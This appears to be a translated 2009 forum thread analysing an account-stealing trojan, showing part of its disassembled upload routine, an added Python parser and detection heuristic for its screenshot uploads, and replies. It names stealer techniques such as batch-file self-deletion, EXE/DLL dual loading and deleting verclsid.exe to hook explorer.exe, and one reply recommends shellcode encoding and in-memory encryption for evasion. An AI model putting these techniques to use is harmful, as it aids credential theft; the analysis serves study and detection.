00402303 FF15 AC414000 |call dword ptr [<&wininet.InternetRe>; wininet.InternetReadFile
00402309 3975 FC |cmp dword ptr , esi
0040230C 74 08 |je short 00402316
0040230E 035D FC |add ebx, dword ptr
00402311 3B5D 24 |cmp ebx, dword ptr
00402314^ 72 D1 \jb short 004022E7
00402316 FF75 2C push dword ptr
00402319 FF15 B0414000 call dword ptr [<&wininet.InternetClo>; wininet.InternetCloseHandle
0040231F 5F pop edi
00402320 FF75 F8 push dword ptr
00402323 FF15 B0414000 call dword ptr [<&wininet.InternetClo>; wininet.InternetCloseHandle
00402329 FF75 F4 push dword ptr
0040232C FF15 B0414000 call dword ptr [<&wininet.InternetClo>; wininet.InternetCloseHandle
00402332 8BC3 mov eax, ebx
00402334 5E pop esi
00402335 5B pop ebx
00402336 C9 leave
00402337 C2 2800 retn 0x28
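As an added example (not code from the post or the sample), here is a parser for the multipart/form-data body that the upload routine above assembles (part header + file bytes + trailer, boundary "fileupload"), plus a detection heuristic for the screenshot upload pattern. It assumes CRLF line terminators per RFC 2046, since the OllyDbg string rendering above is ambiguous; the sample body is constructed.

```python
import re

# Added example, not the sample's code. Boundary string from the request header
# "content-type: multipart/form-data;boundary=fileupload" seen in the listing.
BOUNDARY = b"fileupload"

def parse_multipart(body, boundary=BOUNDARY):
    """Return a list of parts: {'name', 'filename', 'content_type', 'data'}."""
    delim = b"--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing delimiter "--boundary--"
        chunk = chunk.lstrip(b"\r\n")
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue                                # malformed part: no header/body split
        if data.endswith(b"\r\n"):
            data = data[:-2]                        # CRLF that precedes the next delimiter
        hdrs = {}
        for line in head.split(b"\r\n"):
            k, _, v = line.partition(b":")
            hdrs[k.strip().lower()] = v.strip()
        disp = hdrs.get(b"content-disposition", b"")

        def attr(key):
            # lookbehind keeps name= from matching inside filename=
            m = re.search(rb'(?<![a-z])' + key + rb'="([^"]*)"', disp)
            return m.group(1).decode("latin-1") if m else None

        parts.append({"name": attr(b"name"), "filename": attr(b"filename"),
                      "content_type": hdrs.get(b"content-type", b"").decode("latin-1"),
                      "data": data})
    return parts

def looks_like_screenshot_upload(body):
    """Detection heuristic matching what the sample sends: a part named file1 declared
    image/bmp whose data starts with the 'BM' magic the screenshot routine writes."""
    return any(p["name"] == "file1" and p["content_type"] == "image/bmp"
               and p["data"][:2] == b"BM" for p in parse_multipart(body))

# Constructed sample body in the sample's layout (not a real capture).
SAMPLE_BODY = (b"--fileupload\r\n"
               b'content-disposition: form-data; name="file1"; filename="shot.bmp"\r\n'
               b"content-type: image/bmp\r\n\r\n"
               b"BM" + bytes(52) + b"\r\n"
               b"--fileupload--\r\n")
```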
OK, that is basically the whole analysis……
Unfortunately, because of the path where this dropped DLL is stored, together with its base address and PE information, we have no way to write our own loader to load this DLL for live debugging, so I only got a rough look.
Through this account-stealing virus we learned how to make a program delete itself via a batch file, and how to make one program both run as an EXE and load as a DLL……
There is still a lot else that is new for us to learn (such as memory-mapped files, and Internet operations, e.g. a program's automatic update, and so on). This is the first time I have seriously analyzed a virus, and it feels pretty good, hehe.
Posting it here feels a bit like showing off in front of the experts; I've probably given everyone a laugh……
So meticulous!
I need to work hard on myself
and stop losing my composure all the time.
Awesome...... worshipping Brother Chuan's masterpiece, what a detailed analysis..... so strong
Added to the "Virus Analysis Featured Articles Index".
This post was last edited by 惜双双 on 2009-10-25 00:24
This virus is a bit fragile.
It should brush up on shellcode encoding techniques..
and on the use of in-memory encryption templates...
That said.. letting an EXE both execute and be loaded as a DLL..
that part is quite interesting.. a Transformer, huh
Learned something!!
Strong... will study this
Very detailed analysis.. keep it up
The reason for deleting verclsid.exe "should" be so that the DLL runs normally after explorer.exe restarts..
because if the verclsid.exe file is not deleted, the process that loads the DLL is verclsid.exe, whereas once it is deleted, the process that loads the DLL is explorer.exe,
so that the hook can be set up.